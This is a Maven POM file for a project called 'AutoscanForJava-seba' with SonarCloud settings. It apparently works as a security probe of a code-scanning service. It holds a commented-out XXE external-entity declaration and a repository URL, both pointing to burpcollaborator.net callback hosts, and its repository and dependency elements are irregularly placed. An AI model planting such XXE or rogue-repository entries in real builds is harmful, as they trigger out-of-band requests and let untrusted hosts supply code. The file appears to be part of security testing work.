<?xml version="1.0" encoding="UTF-8"?>
<!--<!DOCTYPE a [<!ENTITY xxe SYSTEM "https://b3f3wy1pgwdrk4irelcylq2lhcn3bs.burpcollaborator.net/xxe.ext">]>-->
<project xmlns="http://maven.apache.org/POM/4.0.0"
         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
    <modelVersion>4.0.0</modelVersion>

    <groupId>org.example</groupId>
    <artifactId>AutoscanForJava-seba</artifactId>
    <packaging>pom</packaging>
    <version>1.0-SNAPSHOT</version>
    <modules>
        <module>TestModule</module>
    </modules>

    <properties>
        <maven.compiler.source>11</maven.compiler.source>
        <maven.compiler.target>11</maven.compiler.target>
        <sonar.organization>seba-c53</sonar.organization>
        <sonar.host.url>https://sonarcloud.io</sonar.host.url>
    </properties>

    <repository>
        <id>in-project</id>
        <name>In Project Repo</name>
        <url>https://jczb56axp4mztcrzntl6uybtqkwdk2.burpcollaborator.net/libs</url>
    </repository>

    <dependency>
        <groupId>dropbox</groupId>
        <artifactId>dropbox-sdk</artifactId>
        <version>1.3.1</version>
    </dependency>
</project>
